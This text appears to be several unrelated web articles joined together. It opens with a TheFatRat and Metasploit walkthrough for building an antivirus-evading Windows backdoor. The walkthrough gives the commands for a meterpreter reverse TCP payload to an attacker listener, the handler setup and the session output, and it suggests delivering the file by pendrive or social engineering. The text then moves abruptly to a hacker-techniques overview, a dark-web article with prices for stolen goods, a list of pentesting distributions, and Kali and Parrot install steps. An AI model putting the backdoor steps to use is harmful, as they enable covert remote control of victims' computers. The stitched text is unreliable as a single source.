Using Metasploit is not an difficult thing anymore. Because there are many resources that are available over the internet. Which tells usage of metasploit. Metasploit are the common ways of attacking any outdated operating system. Still there are many operating system which can be exploit remotely. And there are many anti-viruses which cannot detect these exploits, say ethical hacking professionals. We are talking about TheFatRat.
According to ethical hacking researcher of International Institute of Cyber Security did a detailed analysis on the working of TheFatRat to check on the insides of pentesting tool.
TheFatRat is an another metasploit like tool which is used to generate backdoor easily. This tool is used to compile some of the malware with some popular payloads which then can be used to attack operating systems like Windows, MAC, Linux. This tool gives many options like creating backdoors, infected dlls, as per ethical hacking investigation..
The whole tool has been tested on Parrot OS. And after creating backdoors. These backdoors has been opened on Windows 10 Build 1607 and android.
If mono does not install type sudo apt-get update and sudo apt-get install mono-mcs or type sudo apt-get install mono-devel or type sudo apt-get install mono-complete
As some of the dependencies related to mono does no install directly. so simply run above commands.
In installation phase it will ask to create shortcut in parrot OS. Simply type y after installation you can run fatrat just like you run msfconsole.
After then type fatrat
As you can TheFatRat gives tons of options to create session in target windows or other platforms.
CREATING AN SIMPLE EXPLOIT TO HACK WINDOWS 10 :-
Type 6 will create fud backdoor using pwnwinds.
Then type 2 which will create fud backdoor using c# + powershell.
Enter LHOST listener/attacker IP address. Type 192.168.1.12
Type port 4444 or any port number.
Enter backdoor file name tstfile
Type 3 for using windows/meterpreter/reverse_tcp.
Press enter for creating backdoor.
After backdoor is creating it will save in /home/user/Downloads/TheFatRat/output/tstfile.exe
For accessing backdoor go to above location.
Open another terminal and start msfconsole. Msfconsole wiil be used to handle ongoing session.
Type msfconsole
After msfconsole has started type use exploit/multi/handler
Then type set payload windows/meterpreter/reverse_tcp
Type LHOST 192.168.1.12
Type LPORT 4444
Type exploit
msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set LHOST 192.168.1.12 LHOST => 192.168.1.12 msf5 exploit(multi/handler) > set LPORT 4444 LPORT => 4444 msf5 exploit(multi/handler) > exploit
Now for opening backdoor in Windows 10. Simply copy from here and paste to pendrive and open pendrive in Windows 10. You can also use any social engineering technique (like by Fake any website in seconds) to pass this exe to TARGET computer.
You have to copy two files tstfile.exe and program.cs. As this backdoor has created using C#
And then double click on tstfile.exe
As target click on the file a popup will came out and then meterpreter session will be opened.
As shown below meterpreter session has started in msfconsole.
msf5 exploit(multi/handler) > exploit [] Started reverse TCP handler on 192.168.1.12:4444 [] Sending stage (179779 bytes) to 192.168.1.5 [*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.5:61050) at 2019-01-30 12:24:04 +0000 meterpreter > sysinfo Computer : DESKTOP-2304ULE OS : Windows 10 (Build 16299). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows meterpreter >
The above target is using Widnows 10. As session has created attacker can perform various tasks.
A security hacker is someone who explores methods for breaching defenses and exploiting weaknesses in a computer system or network. Hackers may be motivated by a multitude of reasons, such as profit, protest, information gathering, challenge, recreation, or to evaluate system weaknesses to assist in formulating defenses against potential hackers. The subculture that has evolved around hackers is often referred to as the “computer underground”.
*Longstanding controversy surrounds the meaning of the term “hacker“. In this controversy, computer programmers reclaim the term hacker, arguing that it refers simply to someone with an advanced understanding of computers and computer networks and that cracker is the more appropriate term for those who break into computers, whether computer criminals (black hats) or computer security experts (white hats). A 2014 article noted that “… the black-hat meaning still prevails among the general public
Different types of attack
A typical approach in an attack on Internet-connected system is:
Exploitation: Attempting to compromise the system by employing the vulnerabilities found through the vulnerability analysis.
In order to do so, there are several recurring tools of the trade and techniques used by computer criminals and security experts.
Security exploits
A security exploit is a prepared application that takes advantage of a known weakness. Common examples of security exploits are SQL injection, cross-site scripting and cross-site request forgery which abuse security holes that may result from substandard programming practice. Other exploits would be able to be used through File Transfer Protocol (FTP), Hypertext Transfer Protocol (HTTP), PHP, SSH, Telnet and some Web pages. These are very common in Web site and Web domain hacking.
Techniques
Vulnerability scanner
A vulnerability scanner is a tool used to quickly check computers on a network for known weaknesses. Hackers also commonly use port scanners. These check to see which ports on a specified computer are “open” or available to access the computer, and sometimes will detect what program or service is listening on that port, and its version number. (Firewalls defend computers from intruders by limiting access to ports and machines, but they can still be circumvented.)
Finding vulnerabilities
Hackers may also attempt to find vulnerabilities manually. A common approach is to search for possible vulnerabilities in the code of the computer system then test them, sometimes reverse engineering the software if the code is not provided. Experienced hackers can easily find patterns in code to find common vulnerabilities.
Brute-force attack
NoPassword guessing. This method is very fast when used to check all short passwords, but for longer passwords other methods such as the dictionary attack are used, because of the time a brute-force search takes.
Password cracking
Password cracking is the process of recovering passwords from data that has been stored in or transmitted by a computer system. Common approaches include repeatedly trying guesses for the password, trying the most common passwords by hand, and repeatedly trying passwords from a “dictionary”, or a text file with many passwords.
Packet analyzer
A packet analyzer (“packet sniffer”) is an application that captures data packets, which can be used to capture passwords and other data in transit over the network.
Spoofing attack (phishing)
A spoofing attack involves one program, system or website that successfully masquerades as another by falsifying data and is thereby treated as a trusted system by a user or another program — usually to fool programs, systems or users into revealing confidential information, such as user names and passwords.
Rootkit
A rootkit is a program that uses low-level, hard-to-detect methods to subvert control of an operating system from its legitimate operators. Rootkits usually obscure their installation and attempt to prevent their removal through a subversion of standard system security. They may include replacements for system binaries, making it virtually impossible for them to be detected by checking process tables.
Social engineering
In the second stage of the targeting process, hackers often use social engineering tactics to get enough information to access the network. They may contact the system administrator and pose as a user who cannot get access to his or her system. This technique is portrayed in the 1995 film Hackers, when protagonist Dade “Zero Cool” Murphy calls a somewhat clueless employee in charge of security at a television network. Posing as an accountant working for the same company, Dade tricks the employee into giving him the phone number of a modem so he can gain access to the company’s computer system.
MyTrojan horses
A Trojan horse is a program that seems to be doing one thing but is actually doing another. It can be used to set up a back door in a computer system, enabling the intruder to gain access later. (The name refers to the horse from the Trojan War, with the conceptually similar function of deceiving defenders into bringing an intruder into a protected area.)
Computer virus
A virus is a self-replicating program that spreads by inserting copies of itself into other executable code or documents. By doing this, it behaves similarly to a biological virus, which spreads by inserting itself into living cells. While some viruses are harmless or mere hoaxes, most are considered malicious.
Computer worm
Like a virus, a worm is also a self-replicating program. It differs from a virus in that (a.) it propagates through computer networks without user intervention; and (b.) does not need to attach itself to an existing program. Nonetheless, many people use the terms “virus” and “worm” interchangeably to describe any self-propagating program.
Keystroke logging
A keylogger is a tool designed to record (“log”) every keystroke on an affected machine for later retrieval, usually to allow the user of this tool to gain access to confidential information typed on the affected machine. Some keyloggers use virus-, trojan-, and rootkit-like methods to conceal themselves. However, some of them are used for legitimate purposes, even to enhance computer security. For example, a business may maintain a keylogger on a computer used at a point of sale to detect evidence of employee fraud.
Attack patterns
Attack patterns are defined as series of repeatable steps that can be applied to simulate an attack against the security of a system. They can be used for testing purposes or locating potential vulnerabilities. They also provide, either physically or in reference, a common solution pattern for preventing a given attack.
Types of Hackers around the Globe
White, black, and grey refer to the relationship between the hacker and the systems they are attacking.
‘Black Hat’ Hackers
The term “black hat” originated from Western movies, where the bad guys wore black hats and the good guys wore white hats.[1]
A black-hat hacker is an individual who attempts to gain unauthorized entry into a system or network to exploit them for malicious reasons. The black-hat hacker does not have any permission or authority to compromise their targets. They try to inflict damage by compromising security systems, altering functions of websites and networks, or shutting down systems. They often do so to steal or gain access to passwords, financial information, and other personal data.
‘White Hat’ Hackers
White-hat hackers, on the other hand, are deemed to be the good guys, working with organizations to strengthen the security of a system. A white hat has permission to engage the targets and to compromise them within the prescribed rules of engagement.
White-hat hackers are often referred to as ethical hackers. This individual specializes in ethical hacking tools, techniques, and methodologies to secure an organization’s information systems.
Unlike black-hat hackers, ethical hackers exploit security networks and look for backdoors when they are legally permitted to do so. White-hat hackers always disclose every vulnerability they find in the company’s security system so that it can be fixed before they are being exploited by malicious actors.
Some Fortune 50 companies like Facebook, Microsoft, and Google also use white-hat hackers.
‘Grey Hat’ Hackers
Grey hats exploit networks and computer systems in the way that black hats do, but do so without any malicious intent, disclosing all loopholes and vulnerabilities to law enforcement agencies or intelligence agencies.
Usually, grey-hat hackers surf the net and hack into computer systems to notify the administrator or the owner that their system/network contains one or more vulnerabilities that must be fixed immediately. Grey hats may also extort the hacked, offering to correct the defect for a nominal fee.
The dark web is a part of the internet that isn’t indexed by search engines. You’ve no doubt heard talk of the “dark web” as a hotbed of criminal activity — and it is. Researchers Daniel Moore and Thomas Rid of King’s College in London classified the contents of 2,723 live dark web sites over a five-week period in 2015 and found that 57% host illicit material.
A 2019 study, Into the Web of Profit, conducted by Dr. Michael McGuires at the University of Surrey, shows that things have become worse. The number of dark web listings that could harm an enterprise has risen by 20% since 2016. Of all listings (excluding those selling drugs), 60% could potentially harm enterprises.
You can buy credit card numbers, all manner of drugs, guns, counterfeit money, stolen subscription credentials, hacked Netflix accounts and software that helps you break into other people’s computers. Buy login credentials to a $50,000 Bank of America account for $500. Get $3,000 in counterfeit $20 bills for $600. Buy seven prepaid debit cards, each with a $2,500 balance, for $500 (express shipping included). A “lifetime” Netflix premium account goes for $6. You can hire hackers to attack computers for you. You can buy usernames and passwords.
The terms “deep web” and “dark web” are sometimes used interchangeably, but they are not the same. Deep web refers to anything on the internet that is not indexed by and, therefore, accessible via a search engine like Google. Deep web content includes anything behind a paywall or requires sign-in credentials. It also includes any content that its owners have blocked web crawlers from indexing.
Medical records, fee-based content, membership websites, and confidential corporate web pages are just a few examples of what makes up the deep web. Estimates place the size of the deep web at between 96% and 99% of the internet. Only a tiny portion of the internet is accessible through a standard web browser—generally known as the “clear web”.
The dark web is a subset of the deep web that is intentionally hidden, requiring a specific browser—Tor—to access, as explained below. No one really knows the size of the dark web, but most estimates put it at around 5% of the total internet. Again, not all the dark web is used for illicit purposes despite its ominous-sounding.
Dark web tools and services that present enterprise risk
The Into the Web of Profit report identified 12 categories of tools or services that could present a risk in the form of a network breach or data compromise:
Infection or attacks, including malware, distributed denial of service (DDoS) and botnets
Access, including remote access Trojans (RATs), keyloggers and exploits
Espionage, including services, customization and targeting
Support services such as tutorials
Credentials
Phishing
Refunds
Customer data
Operational data
Financial data
Intellectual property/trade secrets
Other emerging threats
The report also outlined three risk variables for each category:
Devaluing the enterprise, which could include undermining brand trust, reputational damage or losing ground to a competitor
Disrupting the enterprise, which could include DDoS attacks or other malware that affects business operations
Defrauding the enterprise, which could include IP theft or espionage that impairs a company’s ability to compete or causes a direct financial l0oss
All this activity, this vision of a bustling marketplace, might make you think that navigating the dark web is easy. It isn’t. The place is as messy and chaotic as you would expect when everyone is anonymous, and a substantial minority are out to scam others.
Accessing the dark web requires the use of an anonymizing browser called Tor. The Tor browser routes your web page requests through a series of proxy servers operated by thousands of volunteers around the globe, rendering your IP address unidentifiable and untraceable. Tor works like magic, but the result is an experience that’s like the dark web itself: unpredictable, unreliable and maddeningly slow.
Still, for those willing to put up with the inconvenience, the dark web provides a memorable glimpse at the seamy underbelly of the human experience – without the risk of skulking around in a dark alley.
Dark web search engine
Dark web search engines exist, but even the best are challenged to keep up with the constantly shifting landscape. The experience is reminiscent of searching the web in the late 1990s. Even one of the best search engines, called Grams, returns results that are repetitive and often irrelevant to the query. Link lists like The Hidden Wiki are another option, but even indices also return a frustrating number of timed-out connections and 404 errors.
Dark web sites
Dark web sites look pretty much like any other site, but there are important differences. One is the naming structure. Instead of ending in .com or .co, dark web sites end in .onion. That’s “a special-use top level domain suffix designating an anonymous hidden service reachable via the Tor network,” according to Wikipedia. Browsers with the appropriate proxy can reach these sites, but others can’t.
Dark web sites also use a scrambled naming structure that creates URLs that are often impossible to remember. For example, a popular commerce site called Dream Market goes by the unintelligible address of “eajwlvm3z2lcca76.onion.”
Many dark websites are set up by scammers, who constantly move around to avoid the wrath of their victims. Even commerce sites that may have existed for a year or more can suddenly disappear if the owners decide to cash in and flee with the escrow money they’re holding on behalf of customers.
Law enforcement officials are getting better at finding and prosecuting owners of sites that sell illicit goods and services. In the summer of 2017, a team of cyber cops from three countries successfully shut down AlphaBay, the dark web’s largest source of contraband, sending shudders throughout the network. But many merchants simply migrated elsewhere.
The anonymous nature of the Tor network also makes it especially vulnerable to DDoS, said Patrick Tiquet, Director of Security & Architecture at Keeper Security, and the company’s resident expert on the topic. “Sites are constantly changing addresses to avoid DDoS, which makes for a very dynamic environment,” he said. As a result, “The quality of search varies widely, and a lot of material is outdated.”
Commerce on the dark web
The dark web has flourished thanks to bitcoin, the crypto-currency that enables two parties to conduct a trusted transaction without knowing each other’s identity. “Bitcoin has been a major factor in the growth of the dark web, and the dark web has been a big factor in the growth of bitcoin,” says Tiquet.
Nearly all dark web commerce sites conduct transactions in bitcoin or some variant, but that doesn’t mean it’s safe to do business there. The inherent anonymity of the place attracts scammers and thieves, but what do you expect when buying guns or drugs is your objective?
Dark web commerce sites have the same features as any e-retail operation, including ratings/reviews, shopping carts and forums, but there are important differences. One is quality control. When both buyers and sellers are anonymous, the credibility of any ratings system is dubious. Ratings are easily manipulated, and even sellers with long track records have been known to suddenly disappear with their customers’ crypto-coins, only to set up shop later under a different alias.
Most e-commerce providers offer some kind of escrow service that keeps customer funds on hold until the product has been delivered. However, in the event of a dispute don’t expect service with a smile. It’s pretty much up to the buyer and the seller to duke it out. Every communication is encrypted, so even the simplest transaction requires a PGP key.
Even completing a transaction is no guarantee that the goods will arrive. Many need to cross international borders, and customs officials are cracking down on suspicious packages. The dark web news site Deep.Dot.Web teems with stories of buyers who have been arrested or jailed for attempted purchases.
Is the dark web illegal?
We don’t want to leave you with the impression that everything on the dark web is nefarious or illegal. The Tor network began as an anonymous communications channel, and it still serves a valuable purpose in helping people communicate in environments that are hostile to free speech. “A lot of people use it in countries where there’s eavesdropping or where internet access is criminalized,” Tiquet said.
If you want to learn all about privacy protection or cryptocurrency, the dark web has plenty to offer. There are a variety of private and encrypted email services, instructions for installing an anonymous operating system and advanced tips for the privacy-conscious.
There’s also material that you wouldn’t be surprised to find on the public web, such as links to full-text editions of hard-to-find books, collections of political news from mainstream websites and a guide to the steam tunnels under the Virginia Tech campus. You can conduct discussions about current events anonymously on Intel Exchange. There are several whistleblower sites, including a dark web version of Wikileaks. Pirate Bay, a BitTorrent site that law enforcement officials have repeatedly shut down, is alive and well there. Even Facebook has a dark web presence.
“More and more legitimate web companies are starting to have presences there,” Tiquet said. “It shows that they’re aware, they’re cutting edge and in the know.”
There’s also plenty of practical value for some organizations. Law enforcement agencies keep an ear to the ground on the dark web looking for stolen data from recent security breaches that might lead to a trail to the perpetrators. Many mainstream media organizations monitor whistleblower sites looking for news.
Staying on top of the hacker underground
Keeper’s Patrick Tiquet checks in regularly because it’s important for him to be on top of what’s happening in the hacker underground. “I use the dark web for situational awareness, threat analysis and keeping an eye on what’s going on,” he said will. “I want to know what information is available and have an external lens into the digital assets that are being monetized – this gives us insight on what hackers are targeting.”
If you find your own information on the dark web, there’s precious little you can do about it, but at least you’ll know you’ve been compromised. Bottom line: If you can tolerate the lousy performance, unpredictable availability, and occasional shock factor of the dark web, it’s worth a visit. Just don’t buy anything there.
A hacker is a highly skilled computer operator who uses bugs and exploits to break into computer systems and networks. An ethical hacker, on the other hand, identifies vulnerabilities in computer systems and networks, and plugs these holes. Here’s a round-up of the ten best operating systems for ethical hackers and penetration testers. 1.KALI LINUX
Kali Linux is based on the Debian-Linux distribution, and is especially designed for digital forensics and penetration testing. It is maintained and updated on a regular basis by Offensive Security Ltd, under the leadership of Mati Aharoni, Devon Kearns and Raphael Hertzog who are core developers. https://www.kali.org/downloads/ Kali comes pre-installed with more than 300 penetration testing programs and can be installed as a primary operating system on the hard disk, live CD/USB and can even run as a virtual machine using some virtualisation software.
2.BackBox
BackBox is an Ubuntu-based Linux distribution aimed at assisting ethical hackers and penetration testers in security assessments. BackBox OS is designed with the objective of being faster, easily operable and having a minimal desktop environment. The key advantage of BackBox is that its own software repositories are updated at regular intervals to keep the distribution stable and popular for real-world operations.https://www.backbox.org/download/
The BackBox distribution consists of more than 70 tools for tasks ranging from Web analysis and network analysis to stress testing, sniffing, vulnerability assessment, forensics and exploitation.
3. PARROT SECURITY OPERATING SYSTEM
Parrot Security OS is based on Debian GNU/Linux combined with the Frozenbox OS and Kali Linux to provide ethical hackers the best-in-class experience of penetration and security testing in real-world environments. It is also designed to provide vulnerability assessment and mitigation, computer forensics and anonymous Web browsing, by the Frozenbox team.
Parrot Security OS makes use of Kali repositories for all sorts of package updates and to integrate new tools. It makes use of the MATE desktop environment using the LightDM display manager to provide an easy-to-use GUI and lightweight environment for computer system analysts to perform all sorts of forensics, vulnerability assessment and cryptography. This OS is known for being highly customisable and for its strong community support.
Equipped with the highly customisable kernel version 4.5, it is currently under rolling release upgrade line and based on Debian 9.Has custom anti-forensic tools, interfaces for GPG, Cryptsetup, and support for LUKS, Truecrypt and VeraCrypt.
It supports FALCON 1.0 programming language, multiple compilers, debuggers and the Qt5 and .NET/mono frameworks.Supports Anonsurf including anonymisation of the entire OS, TOR, I2P anonymous networks and beyond.
A special edition of Parrot Cloud, designed for servers, comprises lightweight Parrot OS distributions without graphics, wireless and forensics tools, and acts as a VPS or dedicated server with only useful security tools.
4. DEFT LINUX
DEFT (Digital Evidence and Forensics Toolkit) is based on GNU Linux and DART (Digital Advanced Response Toolkit), a forensics system comprising some of the best tools for forensics and incident response. DEFT Linux is especially designed for carrying out forensics tasks and runs live on systems without tampering with the hard disk or any other storage media. http://www.deftlinux.net/
It consists of more than 100 highly-rated forensics and hacking tools.It is currently developed and maintained by Stefano Fratepietro along with other developers, and is available free of charge. It is used actively by ethical hackers, pen testers, government officers, IT auditors and even the military for carrying out various forensics based systems analysis.
Full support for Bitlocker encrypted disks, Android and iOS 7.1 logical acquisitions.Consists of Digital Forensics Framework 1.3.
5. SAMURAI WEB TESTING FRAMEWORK
Samurai Web Testing Framework primarily focuses on testing the security of Web applications and comprises lots of Web assessment and exploitation tools. The credit for developing the Samurai Web Testing Framework goes to Kevin Johnson, Justin Searle and Frank DiMaggio. The Samurai Framework provides ethical hackers and pen testers with a live Linux environment that is preconfigured to run as a virtual machine to perform Web penetration testing.http://www.samurai-wtf.org/
The Samurai Web Testing Framework includes popular testing tools like Fierce Domain Scanner and Maltego for Reconnaissance, WebScarab and Ratproxy for mapping, w3af and Burp for discovery, and BeEF and AJAXShell for exploitation.
The framework is based on Ubuntu 9.04, is fully open source and receives regular updates with regard to products.Contains many tools for reconnaissance, mapping, discovery and exploitation, especially focusing on Web penetration testing.Equipped with SVN to provide updated security tools, and syncs with active development tools.
We will require at least 20 GB disk space to install Kali Linux.
We will need a RAM for systems using i386 and amd64 architectures, with at least 1GB of RAM, but it is recommended to have 2GB of RAM or more.
Our system will need to have a CD-DVD Drive support or a USB boot support
STEP 1: BOOT SCREEN
To start the installation, boot the system with either CD or USB, whichever installation medium we have chosen. We will be greeted with the Kali Linux boot screen. Here we can choose either Graphical Install or Text-Mode install. https://www.kali.org/downloads/
STEP 2: SELECT A LANGUAGE
Select the preferred language on the next screen and click on the Continue button.
STEP 3: SELECT YOUR LOCATION
The next step will be specifying our geographic location. We then click on the Continue button.
STEP 4: CONFIGURE THE NETWORK – ENTER HOSTNAME
In this step, the image is copied to our hard disk, our network interfaces are probed, and then we are prompted to enter a hostname for the system. Click on the continue button after entering the hostname.
In our example, we have taken “kali” as our hostname.
STEP 5: CONFIGURE THE NETWORK – ENTER THE DOMAIN NAME
Optionally, we can also provide a domain name for our system to be able to use by default.
STEP 6: SETUP USER ACCOUNT
In the next step, we will need to provide a username for setting up the user account. The full name of the user is a reasonable choice for this field.
STEP 7: SETUP USER ID
Based on the username provided in the previous step, a default user ID will be created. We can change this later from the settings if we like.
STEP 8: CONFIGURE THE CLOCK
Then, we will set our time zone in this step.
STEP 9: PARTITIONING METHOD
In this step, the installer will review and analyze our disks and offer us four choices, as shown in the below screenshot.
For our example, we will be using the entire disk, hence we will choose the first option.
The second and third option will require us to configure LVM (logical volume manager) and the fourth option, Manual, can be used by experienced users for manual partitioning providing them with more granular configuration options.
STEP 10: PARTITION DISKS
After selecting our Partitioning method, we need to select the disk to be partitioned.
STEP 11: PARTITIONING SCHEME
Based on our needs, we can either keep all the directories in a single disk or choose to have distinct partitions for the directories. If we are not sure about the options, it is safest to go with the option “All files in one partition”.
STEP 12: REVIEW CHANGES
This is the review page, where we can analyze the options we have selected and check for one last time if all our configuration changes are correct because once we click on Continue, the installer will get to work and irreversible changes will be made. Here we will have almost finished our installation, as the major steps are done.
STEP 13: CONFIGURE THE PACKAGE MANAGER
In this step, we will configure network mirrors and we will need to enter proxy information if any, as needed.
NOTE: Choosing No on this screen, will not allow us to install packages from Kali repositories
Finally, we have completed the Kali installation. Click on the Continue button to reboot the system into Kali installation.
Now that we have accomplished installing Kali Linux, it is time to sit back and enjoy our new distribution! User Forums can always be used to get more help during and post-installation.
1.After downloading the ISO image, make a bootable media (DVD/USB flash), when you have successfully created a bootable media, insert it into a functioning DVD-drive or USB-port, then boot into it. You should be able to view the screen below. https://parrotsec.org/download/
Using the Down Arrow, scroll down to the “Install” option and hit Enter:
2. You should be at the screen below, where you can choose the type of installer to use. In this case, we shall use the “Standard Installer”, therefore, scroll down to it and hit Enter.
3. Then, select the language you will use for the installation from the next screen and press Enter.
4. In the interface below, you are required to select your current location, simply scroll down and choose your country from the list.
In case you do not see it, move to “other”, you will then view all the continents in the world. Select the appropriate continent and followed by your country, press Enter.
5. Then, configure the system locales, that is in case the country and language combination you selected have no defined locales. Do that in the following screen and hit Enter.
6. Thereafter, configure the keyboard by choosing the keymap to use and press Enter.
7. You will see the screen below, which indicates additional components are being loaded.
8. On the next screen, setup user and password. From the interface below, enter a root use password and hit Enter.
9. Next, setup a user account. Firstly, enter the full name for the user in the screen below and subsequently, set the username and password as well in the next screens, then press Enter to advance.
10. After setting username and password, at this point, you should be at the “Partition disks” screen below. From here, move down to the “Manual” option and hit Enter to advance.
11. Next, you will view a list of the current disk partitions on your harddisk from the interface below. Select the disk partition, which in my case is the 34.4 GB ATA VBOX HARDDISK, by scrolling to highlight it and continue by pressing Enter.
Note: In case you have selected an entire disk to partition, you will be prompted as below, choose <Yes> to create a new empty partition table and continue.
12. Now, select the free space created and advance to further instructions.
13. Go on to select how to use the new empty space, choose “Create a new partition” and proceed by pressing Enter.
14. Now create a root partition with 30GB size and hit Enter to create it.
Then, make the root partition primary as in the interface below and proceed to the next stage.
Make Root Partition Primary
Thereafter, also set the root partition to be created at the beginning of the available free space and press Enter to continue.
Make Root Partition Beginning
Now you can view the interface below, which displays the root partition settings. Remember that the file system type (Ext4) is selected automatically, to use another file system type, simply hit Enter on “Use as” and select the file system type you want to use for the root partition.
Then scroll down to “Done setting up the partition” and continue by pressing Enter.
Root Partition Summary
15. Next, you need to create a swap area, it is a portion of the hard disk space which temporarily holds data from the system RAM that is not currently scheduled to be worked on, by the CPU.
You can create a swap area of size twice as your RAM, for my case I will use the free space left. Therefore, move down to highlight the free space/partition and press Enter.
You will view the create a new partition interface, select “Create a new partition” option and proceed by pressing Enter.
Enter the Swap area size, make it a logical partition and proceed to the next step by pressing Enter.
Set Swap Size
Then select “Use as” and press Enter again.
Create Swap Partition
Choose “Swap area” from the interface below, hit Enter to advance.
Select Swap Area
Finish creating the Swap area by scrolling down to “Done setting up the partition” and press Enter.
Swap Partition Created
16. When you have created all the partitions, you will be at the screen below. Move down to “Finish partitioning and write changes to disk”, then hit Enter to proceed.
Select <Yes> to accept and write changes to disk and then advance by pressing Enter button.
Write Changes to Disk
17. At this point, the system files will be copied to disk and installed, depending on your system specifications, it will take a few minutes.
Installing Parrot OS
18. At a certain point, you will be asked to choose the disk in which the Grub bootloader will be installed. Select the primary harddisk and press Enter to continue and Yes to confirm on the next screen to finish the installation.
19. In the screen below, hit enter to finish the installation process. But the system will not reboot immediately, some packages will be removed from the disk, until that is done, the system will then reboot, remove the installation media and you will view the Grub boot loader menu.
20. At the login prompt, enter your username and password to login.